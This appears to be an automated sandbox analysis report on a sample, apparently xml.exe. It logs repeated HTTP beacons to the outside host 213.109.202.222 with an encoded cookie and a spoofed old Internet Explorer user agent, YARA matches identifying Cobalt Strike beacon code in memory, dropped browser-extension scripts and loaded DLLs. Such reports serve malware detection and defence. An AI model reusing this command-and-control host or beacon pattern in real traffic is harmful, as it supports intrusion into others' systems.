Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.17:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.24.148:443 -> 192.168.2.17:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49866 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000027.00000002.2267358856.0000024D00770000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen

Downloads suspicious files via Chrome

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	File dump: C:\Users\user\AppData\Local\Temp\scoped_dir3988_1099963688\CRX_INSTALL\content.js	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	File dump: C:\Users\user\AppData\Local\Temp\scoped_dir3988_1099963688\CRX_INSTALL\content_new.js	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	File dump: C:\Users\user\AppData\Local\Temp\scoped_dir3988_1227127054\CRX_INSTALL\eventpage_bin_prod.js	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	File dump: C:\Users\user\AppData\Local\Temp\scoped_dir3988_1227127054\CRX_INSTALL\page_embed_script.js	Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: appvisvsubsystems32.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: vcruntime140.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: c2r32.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: appvisvsubsystems32.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: c2r32.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: vcruntime140.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: msvcp140.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: appvisvsubsystems32.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: vcruntime140.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: c2r32.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\xml.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\xml.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\Downloads\xml.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\Downloads\xml.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Downloads\xml.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Downloads\xml.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Downloads\xml.exe	Section loaded: cryptbase.dll
